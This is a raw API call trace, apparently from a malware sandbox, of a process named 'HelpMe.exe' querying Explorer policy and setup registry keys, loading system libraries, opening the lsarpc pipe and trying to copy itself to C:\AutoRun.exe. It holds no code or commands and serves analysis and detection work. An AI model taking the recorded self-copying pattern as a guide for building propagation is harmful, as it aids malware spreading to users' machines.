"20190910075320.560","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.560","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b0","lpValueName->NoPropertiesMyComputer"
"20190910075320.560","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x000000b0","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ"
"20190910075320.560","612","HelpMe.exe","1984","filesystem","CopyFileExW","FAILURE","","lpExistingFileName->C:\WINDOWS\system32\HelpMe.exe","lpNewFileName->C:\AutoRun.exe"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoInternetIcon"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\HelpMe.exe"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoCommonGroups"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoControlPanel"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoSetFolders"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExA","SUCCESS","0x0000009a","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000009a","lpValueName->(null)"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\Setup"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SystemSetupInProgress"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\CurrentControlSet\Control\MiniNT"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\WPA\PnP"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->seed"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->OsLoaderPath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->OsLoaderPath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SystemPartition"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SystemPartition"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SourcePath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SourcePath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackSourcePath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackSourcePath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackCachePath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackCachePath"
"20190910075320.570","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->DriverCachePath"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->DriverCachePath"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->DevicePath"
"20190910075320.600","612","HelpMe.exe","1984","synchronization","CreateMutexW","SUCCESS","0x000000b0","lpName->(null)"
"20190910075320.600","612","HelpMe.exe","1984","synchronization","CreateMutexW","SUCCESS","0x000000bc","lpName->(null)"
"20190910075320.600","612","HelpMe.exe","1984","synchronization","CreateMutexW","SUCCESS","0x000000c4","lpName->(null)"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000c8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->LogLevel"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->LogLevel"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000c8","lpValueName->LogPath"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000c8","lpSubKey->AppLogLevels"
"20190910075320.600","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x77920000","lpFileName->SETUPAPI.dll"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc\PagedBuffers"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegOpenKeyExA","SUCCESS","0x000000c8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpMe.exe\RpcThreadPoolThrottle"
"20190910075320.600","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows NT\Rpc"
"20190910075320.600","612","HelpMe.exe","1984","system","LoadLibraryW","SUCCESS","0x77e70000","lpFileName->rpcrt4.dll"
"20190910075320.600","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x000000ec","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910075320.600","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x000000e8","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910075320.630","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x004d0008","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0121f37c","nOutBufferSize->0x00000208","lpBytesReturned->0x0121f374","lpOverlapped->0x00000000"
"20190910075320.630","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x000000f0","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190910075320.630","612","HelpMe.exe","1984","device","DeviceIoControl","FAILURE","","hDevice->0x000000f0","dwIoControlCode->0x006d0008","lpInBuffer->0x00157b00","nInBufferSize->0x00000046","lpOutBuffer->0x00156e88","nOutBufferSize->0x00000020","lpBytesReturned->0x0121f374","lpOverlapped->0x00000000"
"20190910075320.630","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x006d0008","lpInBuffer->0x00157b00","nInBufferSize->0x00000046","lpOutBuffer->0x00146030","nOutBufferSize->0x000000ee","lpBytesReturned->0x0121f374","lpOverlapped->0x00000000"
"20190910075320.630","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910075320.630","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->0x000000f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910075320.630","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f4","lpValueName->Data"
"20190910075320.630","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910075320.630","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f0","hKey->0x000000f4","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910075320.630","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f0","lpValueName->Generation"
"20190910075320.630","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x000000f0","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190910075320.640","612","HelpMe.exe","1984","device","DeviceIoControl","FAILURE","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b38","nInBufferSize->0x00000208","lpOutBuffer->0x00156068","nOutBufferSize->0x00000008","lpBytesReturned->0x0121f884","lpOverlapped->0x00000000"
"20190910075320.640","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b38","nInBufferSize->0x00000208","lpOutBuffer->0x00158d48","nOutBufferSize->0x00000010","lpBytesReturned->0x0121f884","lpOverlapped->0x00000000"
"20190910075320.640","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x000000f0","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190910075320.640","612","HelpMe.exe","1984","device","DeviceIoControl","FAILURE","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b38","nInBufferSize->0x00000208","lpOutBuffer->0x00156068","nOutBufferSize->0x00000008","lpBytesReturned->0x0121f884","lpOverlapped->0x00000000"
"20190910075320.640","612","HelpMe.exe","1984","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b38","nInBufferSize->0x00000208","lpOutBuffer->0x00158d60","nOutBufferSize->0x00000010","lpBytesReturned->0x0121f884","lpOverlapped->0x00000000"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegCreateKeyExW","SUCCESS","0x000000f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegSetValueExW","SUCCESS","","hKey->0x000000f0","lpValueName->BaseClass","dwType->1","lpData->Drive","cbData->12"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->0x000000f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f4","lpValueName->Generation"
"20190910075320.640","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x7c9c0000","lpFileName->SHELL32.dll"
"20190910075320.640","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f6","hKey->HKEY_CLASSES_ROOT","lpSubKey->Directory"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f6","lpSubKey->CurVer"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f2","hKey->0x000000f6","lpSubKey->(null)"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.640","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f4","lpValueName->DontShowSuperHidden"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->0x000000f4","lpSubKey->(null)"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShellState"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShellState"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->ForceActiveDesktopOn"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoActiveDesktop"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\System"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoWebView"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->ClassicShell"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->SeparateProcess"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoNetCrawling"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoSimpleStartMenu"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->0x000000f4","lpSubKey->Advanced"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->Hidden"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowCompColor"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->HideFileExt"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->DontPrettyPath"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowInfoTip"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->HideIcons"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->MapNetDrvBtn"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->WebView"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->Filter"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowSuperHidden"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->SeparateProcess"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->NoNetCrawling"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f2","lpSubKey->ShellEx\IconHandler"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->DocObject"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->BrowseInPlace"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f2","lpSubKey->Clsid"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000fe","hKey->HKEY_CLASSES_ROOT","lpSubKey->Folder"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000fe","lpSubKey->Clsid"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->IsShortcut"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f2","lpValueName->AlwaysShowExt"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->NeverShowExt"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.650","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->UseDesktopIniCache"
"20190910075320.660","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x77120000","lpFileName->oleaut32.dll"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->Com+Enabled"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\OLE"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->MinimumFreeMemPercentageToCreateProcess"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->MinimumFreeMemPercentageToCreateObject"
"20190910075320.660","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->Com+Enabled"
"20190910075320.660","612","HelpMe.exe","1984","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000104","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000114","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000012c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000134","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000144","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000154","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000015c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000164","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000016c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000016c","lpValueName->REGDBVersion"
"20190910075320.660","612","HelpMe.exe","1984","filesystem","CreateFileW","SUCCESS","0x0000016c","lpFileName->C:\WINDOWS\Registration\R000000000007.clb","dwDesiredAccess->GENERIC_READ"
"20190910075320.660","612","HelpMe.exe","1984","filesystem","ReadFile","SUCCESS","","hFile->0x0000016c","nNumberOfBytesToRead->22512"
